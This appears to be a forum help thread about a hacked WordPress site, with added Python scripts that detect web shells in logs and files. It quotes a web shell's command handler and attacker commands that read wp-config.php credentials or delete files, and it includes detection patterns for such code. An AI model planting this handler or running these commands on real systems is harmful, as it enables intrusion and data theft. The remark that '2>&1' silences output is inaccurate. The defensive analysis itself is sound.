There’s a number of potentials, though one is happening now and that’s attacks on the JSON API. If you’re not using WordPress 4.7.2, you’re vulnerable.

That said, if you’ve upgraded and there’s still code that allows remote execution of code, even the security release update won’t matter as you need to find the source of the attack.

Recommendations

What I would recommend doing is installing the Wordfence Security plugin and letting it perform an initial scan and see what pops up.

Also, this file seems to pop up quite often in the errors you’re showing. Find out what it is and if it’s not something you’ve set up, remove it.

/wp-content/themes/twentysixteen/css/global32.php

Additionally, check your directory permissions. If any directory is set up with a CHMOD of 777, fix it by changing it to 755.

To do this quickly, you can run something such as:

find /var/www/html -type d -exec chmod 755 {} \;

What the above command will do is recursively change all directories to a CHMOD of 755 from ./html and down.

You can do the same for files, which should be CHMOD 644.

find /var/www/html -type f -exec chmod 644 {} \;

Depending on how Apache is set up, this may prevent you from installing plugins or modifying files, though for the time being, that’s not as much of an issue since we are in the process of trying to figure out where the attack is or is heading.
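One way to pull files like global32.php out of an access log automatically, as an added example that is not part of the original answer: it flags PHP scripts inside theme, plugin and upload directories that receive POST requests. The sample lines are constructed in the format of the log in the question, and the list of asset directory names is an assumption.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Assumption: these directories normally hold static assets or uploads, never PHP.
SUSPECT_PATH_RE = re.compile(
    r'^/wp-content/(uploads/.*|(themes|plugins)/[^/]+/(css|js|images?|fonts)/.*)\.php$',
    re.IGNORECASE,
)

# Constructed sample lines (documentation IPs, example.com as the site name).
SAMPLE_LOG = """\
203.0.113.10 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://example.com" "UptimeRobot/2.0"
203.0.113.20 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://example.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.30 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://example.com/wp-content/themes/twentysixteen/css/global32.php" "UCBrowser/9.3.1.344"
203.0.113.40 - - [13/Feb/2017:14:33:40 -0500] "POST /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0"
203.0.113.40 - - [13/Feb/2017:14:33:50 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0"
""".splitlines()


def webshell_candidates(lines):
    """Return {path: stats} for PHP files in asset/upload dirs that receive POSTs."""
    hits = defaultdict(lambda: {"posts": 0, "ok": 0, "self_referer": 0, "ips": set()})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if not SUSPECT_PATH_RE.match(path):
            continue
        stats = hits[path]
        stats["posts"] += 1
        stats["ok"] += int(m["status"] == "200")
        # A form that posts back to itself sends its own URL as the Referer.
        stats["self_referer"] += int(m["referer"].endswith(path))
        stats["ips"].add(m["ip"])
    return dict(hits)


if __name__ == "__main__":
    for path, s in webshell_candidates(SAMPLE_LOG).items():
        print(f"{path}: {s['posts']} POSTs, {s['ok']} answered 200, "
              f"{s['self_referer']} self-referred, {len(s['ips'])} client IPs")
```

A path that keeps answering 200 to POSTs from several clients while the rest of the site returns 500 is the first file to inspect and take offline.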


@sebastiankade

As an update, regarding the hack/breach, here’s the details.

Hopefully my previous response was at least somewhat helpful. Taking a closer look at the base64 code that you provided, once decoded, it’s actually a PHP/JS script that allows a remote attacker to essentially run any command that they wish.

It’s not limited to basic commands such as getting a directory listing using ls or ls -al either. I ran a few tests on a throwaway Droplet and it will allow an attacker to quickly and easily delete your files, so this is something you need to handle quickly if there’s anything that’s of importance.

They are protecting the script with an MD5 hashed password in an attempt to keep it locked down. When successfully logged in you see a black screen and an input/output box. The input accepts any command and the output box shows the results of said command.

So other than creating and deleting files, what good does it do? Well, I did say any command, and that means shell commands.

The part of the script that handles this is this function:

function handle_cmd() {
    system($_POST['cmd']." 2>&1");
}

The above runs a provided shell command and silences the output.

Why does this matter?

Let’s say this script is what the global32.php file is. If I’m the attacker and I log in, I can see that my file is located at:

./wp-content/themes/twentysixteen/css/global32.php

So now in the code box of my script, I’ll run:

cat ../../../../../wp-config.php

… and now I have your MySQL Database Credentials and I know what prefix you’re using for your DB. That means that if further code is injected, the attacker can begin to work his/her way in to your DB and cause more havoc than just adding/tampering with files.

Equally as bad, an attacker could also simply run rm -rf and delete all files/directories in one fell swoop.

Are you keeping your server, your WordPress and your plugins/themes up to date?
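An added example, not code from either answer, that audits a web root for the things this thread points at: the injected eval(base64_decode( header from the question, the system($_POST[...]) handler described above, PHP files sitting in asset directories, and the world-writable (777) permissions mentioned in the first answer. The directory names in ASSET_DIRS and the files built by demo() are assumptions constructed for illustration, and a pattern match is a lead to review by hand rather than proof of compromise.

```python
import os
import re
import stat
import tempfile

# Patterns from the code quoted on this page, whitespace-tolerant.
INJECTION_RE = re.compile(
    rb'eval\s*\(\s*base64_decode\s*\(|system\s*\(\s*\$_(POST|GET|REQUEST)\s*\[')
# Assumption: directory names that should never contain PHP.
ASSET_DIRS = {"css", "js", "images", "fonts", "uploads"}

def audit_webroot(root):
    """Return sorted (relative_path, reason) findings for a WordPress web root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue  # do not follow or rate symlinks
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if not stat.S_ISREG(mode) or not name.lower().endswith(".php"):
                continue
            if ASSET_DIRS & set(rel.split(os.sep)[:-1]):
                findings.append((rel, "php-in-asset-dir"))
            with open(full, "rb") as fh:
                if INJECTION_RE.search(fh.read()):
                    findings.append((rel, "injected-code-pattern"))
    return sorted(findings)

def demo():
    """Build a small constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        css = os.path.join(root, "wp-content", "themes", "twentysixteen", "css")
        os.makedirs(css)
        files = {
            os.path.join(root, "index.php"): b'<?php eval(base64_decode("AAAA"));\n',
            os.path.join(root, "wp-load.php"): b"<?php // clean file\n",
            os.path.join(css, "global32.php"): b"<?php system($_POST['cmd'].\" 2>&1\");\n",
            os.path.join(css, "style.css"): b"body { margin: 0 }\n",
        }
        for path, body in files.items():
            with open(path, "wb") as fh:
                fh.write(body)
            os.chmod(path, 0o644)
        os.chmod(css, 0o777)  # the permission problem the first answer warns about
        return audit_webroot(root)
```

To audit a real site, call audit_webroot() with the web root path and compare anything it flags against a clean copy of the same WordPress, theme and plugin versions.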